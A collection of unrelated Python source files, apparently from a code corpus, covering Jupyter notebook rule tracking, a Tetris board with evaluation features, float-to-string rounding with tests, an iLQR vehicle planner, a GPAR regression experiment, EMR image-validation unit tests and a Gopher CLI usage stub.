command = f'nbdiff {reference_nb} {output_nb} --ignore-metadata --ignore-details --no-use-diff --no-git'
self.text_diff = run_command(command)
from ansi2html import Ansi2HTMLConverter
conv = Ansi2HTMLConverter()
self.text_diff = conv.convert(self.text_diff)
changes = len(self.diff[0]['diff']) if self.diff else 0
# TODO: count only the code cells, not markdown cells?
total_cells = len(notebook_json['cells'])
self.fidelity = (total_cells - changes) / total_cells * 100
if status == 0:
with open(cache_nb_file, 'wb') as f:
pickle.dump({
key: getattr(self, key)
for key in to_cache
}, f)
self.status = status
return status
def to_json(self):
notebook_name = Path(self.notebook).name
return {
'name': self.name,
'arguments': self.serialized_arguments,
'execution_time': self.execution_time,
'type': 'notebook',
'notebook': self.notebook,
'notebook_name': notebook_name,
'fidelity': self.fidelity,
'changes_this_month': self.changes,
'nice_time': nice_time(self.execution_time),
'diff': self.diff,
'text_diff': self.text_diff,
'images': self.images,
'label': self.notebook,
'headers': self.headers,
'status': self.status,
'todos': self.todos,
'group': self.group
# TODO: requires testing
# 'is_tracked': is_tracked_in_version_control(self.notebook)
}
def to_graphiz(self, changes=False):
data = self.to_json()
# TODO: move to static_graph
buttons = []
if changes: # TODO allow to activate
buttons += [f'<td href="{self.repository_url}/commits/master/{self.notebook}">{self.changes} changes this month</td>']
if self.fidelity is not None:
buttons += [f'<td href="">Reproducibility: {self.fidelity:.2f}%</td>']
if self.execution_time is not None:
buttons += [f'<td>Runtime: {nice_time(self.execution_time)}</td>']
buttons_html = '\n'.join(buttons)
if buttons_html:
buttons_html = f'<tr>{ buttons_html }</tr>'
return {
**data,
**{
'shape': 'plain',
'label': f"""<<table cellspacing="0">
<tr><td href="{self.repository_url}/blob/master/{self.notebook}" colspan="{len(buttons)}" title="{data['notebook_name']}">{self.name.replace('&', ' and ')}</td></tr>
</table>>"""
}
}
def is_tracked_in_version_control(file: str):
return check_output(f'git ls-files {file}', shell=True)
def discover_notebooks(root_path='.', ignore=None, ignored_dirs=None, only_tracked_in_git=False, ignore_prefixes=('__', '.')):
"""Useful when working with input/output auto-detection"""
ignored_dirs = ignored_dirs or set()
ignore = ignore or set()
names = {}
rules = []
from typing import Dict
groups: Dict[str, Group] = {}
for dirpath, _, files in walk(root_path):
dirs = dirpath.split(sep)[1:]
if any(dir.startswith('.') or dir in ignored_dirs for dir in dirs):
continue
for file in files:
if any(file.startswith(prefix) for prefix in ignore_prefixes):
continue
if not file.endswith('.ipynb'):
continue
if only_tracked_in_git and not is_tracked_in_version_control(file):
continue
path = sep.join(dirs + [file])
if path in ignore:
continue
name = file[:-6]
name = name[0] + name[1:].replace('_', ' ')
if name in names:
print(name, 'already registered', path, names[name])
else:
names[name] = path
group_id = sep.join(dirs) if dirs else None
rule = NotebookRule(name, notebook=path, group=group_id)
rules.append(rule)
if group_id and group_id not in groups:
groups[group_id] = Group(id=group_id, name=dirs[-1], parent=sep.join(dirs[:-1]))
return {
'rules': rules,
'groups': groups
}
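# Hedged wiring sketch (directory names are hypothetical):
#
#     Rule.setup(cache_dir=Path('cache'), tmp_dir=Path('tmp'))
#     found = discover_notebooks('.', ignored_dirs={'data'})
#     for rule in found['rules']:
#         rule.run(use_cache=True)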
|
29489
|
import random
def get_random_bag():
"""Returns a bag with unique pieces. (Bag randomizer)"""
random_shapes = list(SHAPES)
random.shuffle(random_shapes)
return [Piece(0, 0, shape) for shape in random_shapes]
class Shape:
def __init__(self, code, blueprints):
self.code = code
self.rotations = len(blueprints)
self.blueprints = blueprints
self.shape_coords = []
self.width = len(blueprints[0])
self.height = len(blueprints)
for rotation in range(self.rotations):
self.shape_coords.append(list(self._create_shape_coords(rotation)))
def _get_blueprint(self, rotation):
"""Returns a list of strings that defines how the shape looks like."""
return self.blueprints[rotation % self.rotations]
def get_shape_coords(self, rotation):
"""Returns a list of relative coordinates that make up the shape."""
return self.shape_coords[rotation % self.rotations]
def _create_shape_coords(self, rotation):
blueprint = self._get_blueprint(rotation)
width = len(blueprint[0])
height = len(blueprint)
for offset_y in range(height):
for offset_x in range(width):
if blueprint[offset_y][offset_x] != ' ':
yield offset_y, offset_x
SHAPE_I = Shape(1, [[
' ',
'####',
' ',
' ',
], [
' # ',
' # ',
' # ',
' # ',
]])
SHAPE_O = Shape(2, [[
'##',
'##',
]])
SHAPE_T = Shape(3, [[
' ',
'###',
' # ',
], [
' # ',
'## ',
' # ',
], [
' # ',
'###',
' ',
], [
' # ',
' ##',
' # ',
]])
SHAPE_S = Shape(4, [[
' ',
' ##',
'## ',
], [
' # ',
' ##',
' #',
]])
SHAPE_Z = Shape(5, [[
' ',
'## ',
' ##',
], [
' #',
' ##',
' # ',
]])
SHAPE_J = Shape(6, [[
' ',
'###',
' #',
], [
' # ',
' # ',
'## ',
], [
'# ',
'###',
' ',
], [
' ##',
' # ',
' # ',
]])
SHAPE_L = Shape(7, [[
' ',
'###',
'# ',
], [
'## ',
' # ',
' # ',
], [
' #',
'###',
' ',
], [
' # ',
' # ',
' ##',
]])
SHAPES = [SHAPE_I, SHAPE_O, SHAPE_T, SHAPE_S, SHAPE_Z, SHAPE_J, SHAPE_L]
class Piece:
def __init__(self, x, y, shape: Shape, rotation=0):
self.x = x
self.y = y
self.shape = shape
self.rotation = rotation
self.shape_coords = None
def rotate(self, dir_rotate):
"""Rotate the piece."""
self.rotation += dir_rotate
self.shape_coords = None
def move(self, x, y):
"""Move the piece."""
self.x += x
self.y += y
self.shape_coords = None
def get_shape_coords(self):
"""Returns a list of coordinates that the piece occupies."""
if self.shape_coords is None:
begin_x = self.x - round(self.shape.width / 2)
begin_y = self.y
shape_coords = self.shape.get_shape_coords(self.rotation)
self.shape_coords = [(begin_x + offset_x, begin_y + offset_y) for offset_y, offset_x in shape_coords]
return self.shape_coords
class Board:
def __init__(self, columns, rows):
self.columns = columns
self.rows = rows
self.pieces_table = [[0 for i in range(columns)] for j in range(rows)]
self.piece = None
self.piece_next = None
self.piece_holding = None
self.piece_last = None
self.can_hold = True
self.bag = get_random_bag()
self.create_piece()
def create_piece(self):
"""The next piece becomes the current piece and spawn it on the board."""
if self.piece_next is not None:
self.piece = self.piece_next
else:
self.piece = self.bag.pop()
self.piece.move(int(self.columns / 2), 0)
self.piece_next = self.bag.pop()
self.can_hold = True
if not self.bag:
self.bag = get_random_bag()
def _place_piece(self):
"""Solidify the current piece onto the board and returns success."""
coords = self.piece.get_shape_coords()
if any(x < 0 or x >= self.columns or y < 0 or y >= self.rows or self.pieces_table[y][x] != 0 for x, y in
coords):
return False
for x, y in coords:
self.pieces_table[y][x] = self.piece.shape.code
self.piece_last = self.piece
self.piece = None
return True
def can_move_piece(self, dir_x, dir_y):
"""Returns true if the piece does not intersect with a non-empty cell when moved."""
for x, y in self.piece.get_shape_coords():
next_x = x + dir_x
next_y = y + dir_y
if next_x < 0 or next_x >= self.columns or next_y < 0 or next_y >= self.rows:
return False
if self.pieces_table[next_y][next_x] != 0:
return False
return True
def move_piece(self, dir_x):
"""Move the piece in a direction and returns success."""
if self.piece is None:
return False
if not self.can_move_piece(dir_x, 0):
return False
self.piece.move(dir_x, 0)
return True
def drop_piece(self):
"""Drop the piece by one cell and returns success."""
if self.piece is None:
return False
if not self.can_move_piece(0, 1):
self._place_piece()
return True
self.piece.move(0, 1)
return False
def rotate_piece(self, dir_rotation):
"""Rotate the current piece and returns success."""
if self.piece is None:
return False
self.piece.rotate(dir_rotation)
if not self.can_move_piece(0, 0):
if not self.move_piece(-1) and not self.move_piece(1):
self.piece.rotate(-dir_rotation)
return False
return True
def is_game_over(self):
"""Returns if the current piece is able to move."""
return self.piece is not None and not self.can_move_piece(0, 0)
def is_row(self, y):
"""Returns if the row is a fully filled one."""
return 0 not in self.pieces_table[y]
def remove_row(self, y):
"""Removes a row from the board."""
removed_row = self.pieces_table.pop(y)
self.pieces_table.insert(0, [0 for i in range(self.columns)])
return removed_row
def insert_row(self, y, row):
"""Inserts a row into the board."""
self.pieces_table.pop(0)
self.pieces_table.insert(y, row)
def move_and_drop(self, x, rotation):
"""Move the piece and drop it as far down as possible and returns success."""
if self.piece is None:
return False
self.piece.rotate(rotation)
return self.can_move_piece(0, 0) and self.move_piece(-self.piece.x + x) and self.drop_piece_fully()
def drop_piece_fully(self):
"""Drops the current piece as far down as possible and returns success."""
if self.piece is None:
return False
while self.can_move_piece(0, 1):
self.piece.move(0, 1)
return self._place_piece()
def hold_piece(self):
"""Switches the piece held with the current and returns success."""
if self.piece is None or not self.can_hold:
return False
piece_current = self.piece
self.piece = self.piece_holding
self.piece_holding = piece_current
self.piece_holding.move(-self.piece_holding.x, -self.piece_holding.y)
if self.piece is None:
self.create_piece()
else:
self.piece.move(int(self.columns / 2), 2)
self.can_hold = False
return True
def get_possible_states(self):
"""Returns all possible states of the board with the corresponding action tuple.
Tries out every possible way to turn and move the current piece.
The action taken and the resulting state of the board are combined into a tuple and added to the returned list.
After every try the board is reset to its original state.
:rtype: A list with a tuple of (action, state).
action = (column, rotation)
state = return value of `get_info`
"""
if self.piece is None:
return []
states = []
last_piece = self.piece_last
for rotation in range(self.piece.shape.rotations):
for column in range(self.columns + 1):
piece = Piece(self.piece.x, self.piece.y, self.piece.shape, self.piece.rotation)
# Execute
if self.move_and_drop(column, rotation):
rows_cleared = self.get_cleared_rows()
removed_rows = []
for y in rows_cleared:
removed_rows.append((y, self.remove_row(y)))
# Save
states.append(((column, rotation), self.get_info(rows_cleared)))
# Reset
for y, row in reversed(removed_rows):
self.insert_row(y, row)
for x, y in self.piece_last.get_shape_coords():
self.pieces_table[y][x] = 0
self.piece = piece
self.piece_last = last_piece
return states
def get_info(self, rows_cleared):
"""Returns the state of the board using statistics.
0: Rows cleared
1: Bumpiness
2: Holes
3: Landing height
4: Row transitions
5: Column transitions
6: Cumulative wells
7: Eroded piece cells
8: Aggregate height
:rtype: Integer array
"""
if self.piece_last is not None:
last_piece_coords = self.piece_last.get_shape_coords()
eroded_piece_cells = len(rows_cleared) * sum(y in rows_cleared for x, y in last_piece_coords)
landing_height = 0 if self.piece_last is None else 1 + self.rows - max(y for x, y in last_piece_coords)
else:
eroded_piece_cells = 0
landing_height = 0
return [
len(rows_cleared),
self.get_bumpiness(),
self.get_hole_count(),
landing_height,
self.get_row_transitions(),
self.get_column_transitions(),
self.get_cumulative_wells(),
eroded_piece_cells,
self.get_aggregate_height(),
]
def get_cleared_rows(self):
"""Returns the the amount of rows cleared."""
return list(filter(lambda y: self.is_row(y), range(self.rows)))
def get_row_transitions(self):
"""Returns the number of horizontal cell transitions."""
total = 0
for y in range(self.rows):
row_count = 0
last_empty = False
for x in range(self.columns):
empty = self.pieces_table[y][x] == 0
if last_empty != empty:
row_count += 1
last_empty = empty
if last_empty:
row_count += 1
if last_empty and row_count == 2:
continue
total += row_count
return total
def get_column_transitions(self):
"""Returns the number of vertical cell transitions."""
total = 0
for x in range(self.columns):
column_count = 0
last_empty = False
for y in reversed(range(self.rows)):
empty = self.pieces_table[y][x] == 0
if last_empty and not empty:
column_count += 2
last_empty = empty
if last_empty and column_count == 1:
continue
total += column_count
return total
def get_bumpiness(self):
"""Returns the total of the difference between the height of each column."""
bumpiness = 0
last_height = -1
for x in range(self.columns):
current_height = 0
for y in range(self.rows):
if self.pieces_table[y][x] != 0:
current_height = self.rows - y
break
if last_height != -1:
bumpiness += abs(last_height - current_height)
last_height = current_height
return bumpiness
def get_cumulative_wells(self):
"""Returns the sum of all wells."""
wells = [0 for i in range(self.columns)]
for y, row in enumerate(self.pieces_table):
left_empty = True
for x, code in enumerate(row):
if code == 0:
well = False
right_empty = self.columns > x + 1 >= 0 and self.pieces_table[y][x + 1] == 0
if left_empty or right_empty:
well = True
wells[x] = 0 if well else wells[x] + 1
left_empty = True
else:
left_empty = False
return sum(wells)
def get_aggregate_height(self):
"""Returns the sum of the heights of each column."""
aggregate_height = 0
for x in range(self.columns):
for y in range(self.rows):
if self.pieces_table[y][x] != 0:
aggregate_height += self.rows - y
break
return aggregate_height
def get_hole_count(self):
"""returns the number of empty cells covered by a full cell."""
hole_count = 0
for x in range(self.columns):
below = False
for y in range(self.rows):
empty = self.pieces_table[y][x] == 0
if not below and not empty:
below = True
elif below and empty:
hole_count += 1
return hole_count
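# Hedged usage sketch: enumerate afterstates and greedily pick the placement with
# the fewest holes (index 2 of get_info); the selection criterion is illustrative.
if __name__ == '__main__':
    board = Board(columns=10, rows=20)
    (column, rotation), info = min(board.get_possible_states(), key=lambda s: s[1][2])
    board.move_and_drop(column, rotation)
    for y in board.get_cleared_rows():
        board.remove_row(y)
    board.create_piece()
    print(info)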
|
29501
|
import math
import sys
from fractions import Fraction
from random import uniform, randint
import decimal as dec
def log10_floor(f):
b, k = 1, -1
while b <= f:
b *= 10
k += 1
return k
def log10_ceil(f):
b, k = 1, 0
while b < f:
b *= 10
k += 1
return k
# A second implementation using growing steps; being defined later, it overrides
# the simpler log10_floor above.
def log10_floor(f):
if f <= 0: return -1
t, b, k, k_step = 1, 10, 0, 1
while True:
t1 = t * b
if t1 > f:
if k_step == 1:
break
k_step = 1
b = 10
else:
b *= 10
k += k_step
k_step += 1
t = t1
return k
# for i in range(20):
# f = 10 ** i
# print(f'{f}: {log10_floor(f)}, {log10_floor2(f)}')
# print(log10_floor2(100))
# sys.exit(0)
def str_of_pos_float_hi0(prec, x):
assert x > 0
q = Fraction(x)
n = int(q)
if n > 0:
k = log10_floor(n) + 1
if k >= prec:
b = 10 ** (k - prec)
r, e = n // b, k - prec
else:
b = 10 ** (prec - k)
r, e = n * b + int((q - n) * b), k - prec
else:
k = log10_floor(int(1 / q))
b = 10 ** (k + prec)
r, e = int(q * b), -(k + prec)
if r * Fraction(10) ** e < q:
r += 1
s = str(r)
if len(s) > prec:
s = s[:-1]
e += 1
e += prec - 1
s = f'{s[0]}.{s[1:]}'
if e == 0:
return s
return s + ('e+' if e > 0 else 'e') + str(e)
def str_of_pos_float_hi1(prec, x):
assert x > 0
m, exp = math.frexp(x)
m, exp = int(math.ldexp(m, 53)), exp - 53
mask = (1 << abs(exp)) - 1
if exp >= 0:
n, rem = m << exp, 0
else:
n, rem = m >> -exp, m & mask
if n > 0:
k = log10_floor(n) + 1
if k >= prec:
b = 10 ** (k - prec)
(r, rem2), e = divmod(n, b), k - prec
rem2 = rem2 or rem
else:
b = 10 ** (prec - k)
t = rem * b
t, rem2 = t >> -exp, t & mask
r, e = n * b + t, k - prec
else:
k = log10_floor((1 << -exp) // rem)
b = 10 ** (k + prec)
t = rem * b
r, rem2, e = t >> -exp, t & mask, -(k + prec)
if rem2:
r += 1
s = str(r)
assert prec <= len(s) <= prec + 1
if len(s) > prec:
s = s[:-1]
e += 1
e += prec - 1
s = f'{s[0]}.{s[1:]}'
if e == 0:
return s
return s + ('e+' if e > 0 else 'e') + str(e)
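# Worked example (exact because 0.125 is a power of two): math.frexp(0.125) gives
# (0.5, -2), so m = 2**52 and exp = -55; the integer part n is 0, k = 0, and
# r = (2**52 * 10**3) >> 55 = 125 with remainder 0, so no round-up is needed and
# str_of_pos_float_hi1(3, 0.125) returns '1.25e-1'.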
def str_of_pos_float_lo(prec, x):
assert x > 0
m, exp = math.frexp(x)
m, exp = int(math.ldexp(m, 53)), exp - 53
if exp >= 0:
n, rem = m << exp, 0
else:
mask = (1 << abs(exp)) - 1
n, rem = m >> -exp, m & mask
if n > 0:
k = log10_floor(n) + 1
if k >= prec:
b = 10 ** (k - prec)
r, e = n // b, k - prec
else:
b = 10 ** (prec - k)
t = (rem * b) >> -exp
r, e = n * b + t, k - prec
else:
k = log10_floor((1 << -exp) // rem)
b = 10 ** (k + prec)
t = rem * b
r, e = (rem * b) >> -exp, -(k + prec)
s = str(r)
assert len(s) == prec
e += prec - 1
s = f'{s[0]}.{s[1:]}'
if e == 0:
return s
return s + ('e+' if e > 0 else 'e') + str(e)
# print(str_of_pos_float_hi(2, 230454523525e+100))
def decimal_test_hi(prec, x, s=None):
if s is None:
s = str_of_pos_float_hi1(prec, x)
with dec.localcontext() as ctx:
ctx.prec = prec
ctx.rounding = dec.ROUND_UP
v = +dec.Decimal(x)
t = +dec.Decimal(s)
if v != t:
print(f'Error (hi): decimal = {v}, my = {s} (prec = {prec}, x = {x})')
def decimal_test_lo(prec, x, s=None):
if s is None:
s = str_of_pos_float_lo(prec, x)
with dec.localcontext() as ctx:
ctx.prec = prec
ctx.rounding = dec.ROUND_DOWN
v = +dec.Decimal(x)
t = +dec.Decimal(s)
if v != t:
print(f'Error (lo): decimal = {v}, my = {s} (prec = {prec}, x = {x})')
def tests(n, a, b):
for _ in range(n):
x = uniform(a, b)
prec = randint(1, 15)
decimal_test_hi(prec, x)
decimal_test_lo(prec, x)
def tests2(n):
for _ in range(n):
prec = randint(1, 15)
t = randint(-100, 100)
decimal_test_hi(prec, 2.0 ** t)
decimal_test_lo(prec, 2.0 ** t)
tests(10000, 1e-300, 1)
tests(10000, 0.5, 1000)
tests(10000, 1e+10, 1e+100)
tests(10000, 1e-300, 1e+300)
tests2(10000)
#print(str_of_pos_float_hi1(1, 0.47))
#print(str_of_pos_float_hi1(1, 0.5))
# print(str_of_pos_float_hi1(100, 0.3))
def check_ocaml_results(fname):
print(f'Checking: {fname}')
with open(fname, 'r') as f:
for line in f:
x, prec, s0, s1, s_lo = line.strip().split(',')
decimal_test_hi(int(prec), float(x), s0)
decimal_test_hi(int(prec), float(x), s1)
decimal_test_lo(int(prec), float(x), s_lo)
check_ocaml_results('out.txt')
|
29507
|
import glob
import matplotlib.pyplot as plt
import numpy as np
import sys
plt.ion()
data_files = list(glob.glob(sys.argv[1]+'/mnist_net_*_train.log'))
valid_data_files = list(glob.glob(sys.argv[1]+'/mnist_net_*_valid.log'))
for fname in data_files:
data = np.loadtxt(fname).reshape(-1, 3)
name = fname.split('/')[-1]
plt.plot(data[:, 0], 1-data[:, 2], label=name)
for fname in valid_data_files:
data = np.loadtxt(fname).reshape(-1, 2)
name = fname.split('/')[-1]
plt.plot(data[:, 0], 1-data[:, 1], label=name)
plt.legend(loc=1)
input('Press Enter.')
|
29523
|
import math
import numpy as np
import matplotlib.pyplot as plt
import scipy.integrate as integrate
import pdb
import sys
from ilqr.vehicle_model import Model
from ilqr.local_planner import LocalPlanner
from ilqr.constraints import Constraints
class iLQR():
def __init__(self, args, obstacle_bb, verbose=False):
self.args = args
self.Ts = args.timestep
self.N = args.horizon
self.tol = args.tol
self.obstacle_bb = obstacle_bb
self.verbose = verbose
self.global_plan = None
self.local_planner = LocalPlanner(args)
self.vehicle_model = Model(args)
self.constraints = Constraints(args, obstacle_bb)
# initial nominal trajectory
self.control_seq = np.zeros((self.args.num_ctrls, self.args.horizon))
self.control_seq[0, :] = np.ones((self.args.horizon)) * 0.5
self.debug_flag = 0
self.lamb_factor = 10
self.max_lamb = 1000
# self.fig, (self.ax1, self.ax2, self.ax3) = plt.subplots(1,3, num=0, figsize=(20, 5))
def set_global_plan(self, global_plan):
self.global_plan = global_plan
self.local_planner.set_global_planner(self.global_plan)
def get_nominal_trajectory(self, X_0, U):
X = np.zeros((self.args.num_states, self.args.horizon+1))
X[:, 0] = X_0
for i in range(self.args.horizon):
X[:, i+1] = self.vehicle_model.forward_simulate(X[:, i], U[:, i])
return X
def forward_pass(self, X, U, k, K):
X_new = np.zeros((self.args.num_states, self.args.horizon+1))
X_new[:, 0] = X[:, 0]
U_new = np.zeros((self.args.num_ctrls, self.args.horizon))
# Do a forward rollout and get states at all control points
for i in range(self.args.horizon):
U_new[:, i] = U[:, i] + k[:, i] + K[:, :, i] @ (X_new[:, i] - X[:, i])
X_new[:, i+1] = self.vehicle_model.forward_simulate(X_new[:, i], U_new[:, i])
return X_new, U_new
def backward_pass(self, X, U, poly_coeff, x_local_plan, npc_traj, lamb):
# Find control sequence that minimizes Q-value function
# Get derivatives of Q-function wrt to state and control
l_x, l_xx, l_u, l_uu, l_ux = self.constraints.get_cost_derivatives(X[:, 1:], U, poly_coeff, x_local_plan, npc_traj)
df_dx = self.vehicle_model.get_A_matrix(X[2, 1:], X[3, 1:], U[0,:])
df_du = self.vehicle_model.get_B_matrix(X[3, 1:])
# Value function at final timestep is known
V_x = l_x[:,-1]
V_xx = l_xx[:,:,-1]
# Allocate space for feedforward and feeback term
k = np.zeros((self.args.num_ctrls, self.args.horizon))
K = np.zeros((self.args.num_ctrls, self.args.num_states, self.args.horizon))
# Run a backwards pass from N-1 control step
for i in range(self.args.horizon-1,-1,-1):
Q_x = l_x[:,i] + df_dx[:,:,i].T @ V_x
Q_u = l_u[:,i] + df_du[:,:,i].T @ V_x
Q_xx = l_xx[:,:,i] + df_dx[:,:,i].T @ V_xx @ df_dx[:,:,i]
Q_ux = l_ux[:,:,i] + df_du[:,:,i].T @ V_xx @ df_dx[:,:,i]
Q_uu = l_uu[:,:,i] + df_du[:,:,i].T @ V_xx @ df_du[:,:,i]
# Q_uu_inv = np.linalg.pinv(Q_uu)
Q_uu_evals, Q_uu_evecs = np.linalg.eig(Q_uu)
Q_uu_evals[Q_uu_evals < 0] = 0.0
Q_uu_evals += lamb
Q_uu_inv = np.dot(Q_uu_evecs,np.dot(np.diag(1.0/Q_uu_evals), Q_uu_evecs.T))
# Calculate feedforward and feedback terms
k[:,i] = -Q_uu_inv @ Q_u
K[:,:,i] = -Q_uu_inv @ Q_ux
# Update value function for next time step
V_x = Q_x - K[:,:,i].T @ Q_uu @ k[:,i]
V_xx = Q_xx - K[:,:,i].T @ Q_uu @ K[:,:,i]
return k, K
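# Reference for the backward pass above (standard iLQR recursion, written out
# here for readability; not specific to this codebase):
#   Q_x  = l_x  + f_x^T V_x            Q_u  = l_u  + f_u^T V_x
#   Q_xx = l_xx + f_x^T V_xx f_x       Q_ux = l_ux + f_u^T V_xx f_x
#   Q_uu = l_uu + f_u^T V_xx f_u
#   k = -Q_uu^{-1} Q_u                 K = -Q_uu^{-1} Q_ux
#   V_x  = Q_x - K^T Q_uu k            V_xx = Q_xx - K^T Q_uu K
# The implementation additionally clamps negative eigenvalues of Q_uu and adds
# the regularizer `lamb` before inverting, which keeps the control update
# well-conditioned when Q_uu is nearly singular.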
def run_step(self, ego_state, npc_traj):
assert self.global_plan is not None, "Set a global plan in iLQR before starting run_step"
self.local_planner.set_ego_state(ego_state)
ref_traj, poly_coeff = self.local_planner.get_local_plan()
X_0 = np.array([ego_state[0][0], ego_state[0][1], ego_state[1][0], ego_state[2][2]])
# self.control_seq[:, :-1] = self.control_seq[:, 1:]
# self.control_seq[:, -1] = np.zeros((self.args.num_ctrls))
X, U = self.get_optimal_control_seq(X_0, self.control_seq, poly_coeff, ref_traj[:, 0], npc_traj)
traj = X[:2, ::int(self.args.horizon/10)].T
self.control_seq = U
# self.plot(U, X, ref_traj)
return traj, ref_traj, U #self.filter_control(U, X[2,:])
def get_optimal_control_seq(self, X_0, U, poly_coeff, x_local_plan, npc_traj):
X = self.get_nominal_trajectory(X_0, U)
J_old = sys.float_info.max
lamb = 1 # Regularization parameter
# Run iLQR for max iterations
for itr in range(self.args.max_iters):
k, K = self.backward_pass(X, U, poly_coeff, x_local_plan, npc_traj, lamb)
# Get control values at control points and new states again by a forward rollout
X_new, U_new = self.forward_pass(X, U, k, K)
J_new = self.constraints.get_total_cost(X, U, poly_coeff, x_local_plan, npc_traj)
if J_new < J_old:
X = X_new
U = U_new
lamb /= self.lamb_factor
if (abs(J_old - J_new) < self.args.tol):
print("Tolerance reached")
break
else:
lamb *= self.lamb_factor
if lamb > self.max_lamb:
break
J_old = J_new
# print(J_new)
return X, U
def filter_control(self, U, velocity):
U[1] = np.arctan2(self.args.wheelbase*U[1],velocity[:-1])
return U
def plot(self, control, X, ref_traj):
self.ax1.clear()
self.ax1.plot(np.arange(len(control[0])), control[0,:], color='g', label='Acc')
self.ax1.plot(np.arange(len(control[0])), control[1,:], color='b', label='Yaw Rate')
self.ax1.set_ylabel('Values')
self.ax1.set_xlabel('Time')
self.ax1.set_title('Controls',fontsize=18)
# self.ax1.xlim(0, len(control[0]))
# self.ax1.ylim(-6, 6)
# self.ax1.axis('equal')
self.ax1.legend()
self.ax1.grid()
self.ax2.clear()
self.ax2.plot(ref_traj[:, 0], ref_traj[:, 1], color='r', label='Ref Traj')
self.ax2.plot(X[0, :], X[1, :], color='g', label='Real Traj')
self.ax2.set_ylabel('y')
self.ax2.set_xlabel('x')
self.ax2.set_title('Position Trajectory',fontsize=18)
self.ax2.legend()
self.ax2.grid()
# plt.legend()
self.ax3.clear()
self.ax3.plot(np.arange(len(X[0])), X[2, :], color='r', label='Velocity')
self.ax3.plot(np.arange(len(X[0])), X[3, :], color='g', label='Yaw')
self.ax3.set_ylabel('Values')
self.ax3.set_xlabel('Time')
self.ax3.set_title('Traj',fontsize=18)
self.ax3.grid()
self.ax3.legend()
plt.pause(0.001)
|
29556
|
import matplotlib.pyplot as plt
import numpy as np
from gpar.regression import GPARRegressor
from wbml.experiment import WorkingDirectory
import wbml.plot
if __name__ == "__main__":
wd = WorkingDirectory("_experiments", "synthetic", seed=1)
# Create toy data set.
n = 200
x = np.linspace(0, 1, n)
noise = 0.1
# Draw functions depending on each other in complicated ways.
f1 = -np.sin(10 * np.pi * (x + 1)) / (2 * x + 1) - x ** 4
f2 = np.cos(f1) ** 2 + np.sin(3 * x)
f3 = f2 * f1 ** 2 + 3 * x
f = np.stack((f1, f2, f3), axis=0).T
# Add noise and subsample.
y = f + noise * np.random.randn(n, 3)
x_obs, y_obs = x[::8], y[::8]
# Fit and predict GPAR.
model = GPARRegressor(
scale=0.1,
linear=True,
linear_scale=10.0,
nonlinear=True,
nonlinear_scale=0.1,
noise=0.1,
impute=True,
replace=False,
normalise_y=False,
)
model.fit(x_obs, y_obs)
means, lowers, uppers = model.predict(
x, num_samples=200, credible_bounds=True, latent=True
)
# Fit and predict independent GPs: set `markov=0` in GPAR.
igp = GPARRegressor(
scale=0.1,
linear=True,
linear_scale=10.0,
nonlinear=True,
nonlinear_scale=0.1,
noise=0.1,
markov=0,
normalise_y=False,
)
igp.fit(x_obs, y_obs)
igp_means, igp_lowers, igp_uppers = igp.predict(
x, num_samples=200, credible_bounds=True, latent=True
)
# Plot the result.
plt.figure(figsize=(15, 3))
for i in range(3):
plt.subplot(1, 3, i + 1)
# Plot observations.
plt.scatter(x_obs, y_obs[:, i], label="Observations", style="train")
plt.plot(x, f[:, i], label="Truth", style="test")
# Plot GPAR.
plt.plot(x, means[:, i], label="GPAR", style="pred")
plt.fill_between(x, lowers[:, i], uppers[:, i], style="pred")
# Plot independent GPs.
plt.plot(x, igp_means[:, i], label="IGP", style="pred2")
plt.fill_between(x, igp_lowers[:, i], igp_uppers[:, i], style="pred2")
plt.xlabel("$t$")
plt.ylabel(f"$y_{i + 1}$")
wbml.plot.tweak(legend=i == 2)
plt.tight_layout()
plt.savefig(wd.file("synthetic.pdf"))
|
29574
|
import unittest
import io
from unittest import mock
from tests.lib.utils import INSPECT
from custom_image_cli.validation_tool import validation_helper
from custom_image_cli.validation_tool.validation_models.validation_models import \
ImageDetail, ImageManifest, EmrRelease
class TestValidationHelper(unittest.TestCase):
def setUp(self) -> None:
self.inspect = INSPECT
self.manifest = ImageManifest([EmrRelease("release_name", [ImageDetail("image_type", None, [], [])])], [], [])
@mock.patch('sys.stdout', new_callable=io.StringIO)
@mock.patch('custom_image_cli.validation_tool.validation_helper.load_validation_info')
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_local_job_run.CheckLocalJobRun.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_manifest.CheckManifest.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_files.CheckFiles.__init__")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.check")
@mock.patch("custom_image_cli.validation_tool.validation_tests.check_envs.CheckEnvs.__init__")
def test_validate_all(self, check_envs_constructor, check_envs, check_files_constructor,
check_files, check_manifest_constructor,
check_manifest, check_local_job_run, load_info, mock_stdout):
check_envs_constructor.return_value = None
check_envs.return_value = True
check_files_constructor.return_value = None
check_files.return_value = True
check_manifest_constructor.return_value = None
check_manifest.return_value = True
check_local_job_run.return_value = True
load_info.return_value = ImageDetail("image_type", None, [], []), [], []
actual = validation_helper.validate_all(self.inspect, "docker_cmd", "docker_image_uri",
self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual, True)
check_manifest.assert_called_once()
check_envs.assert_called_once()
check_files.assert_called_once()
check_local_job_run.assert_called_once()
expected = "... Checking Image Manifest\n"
self.assertEqual(expected, mock_stdout.getvalue())
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_version")
@mock.patch("custom_image_cli.validation_tool.check_inputs.check_image")
def test_load_validation_info(self, check_image, check_version):
value = self.manifest
check_version.return_value = None
check_image.return_value = None
actual_img, actual_file, actual_env = validation_helper.load_validation_info(self.manifest, "release_name", "image_type", "log")
self.assertEqual(actual_img, self.manifest.emr_releases[0].images[0])
self.assertEqual(actual_file, [])
self.assertEqual(actual_env, [])
check_version.assert_called_once_with(self.manifest.emr_releases[0], "release_name", "log")
check_image.assert_called_once_with(self.manifest.emr_releases[0].images[0], "image_type", "log")
|
29599
|
import importlib
import sys
import pituophis
# check if the user is running the script with the correct number of arguments
if len(sys.argv) < 2:
# if not, print the usage
    print('usage: pituophis [command] [options]')
print('Commands:')
print(' serve [options]')
print(' fetch [url] [options]')
print('Server Options:')
print(' -H, --host=HOST\t\tAdvertised host (default: 127.0.0.1)')
print(' -p, --port=PORT\t\tPort to bind to (default: 70)')
print(' -a, --advertised-port=PORT\tPort to advertise')
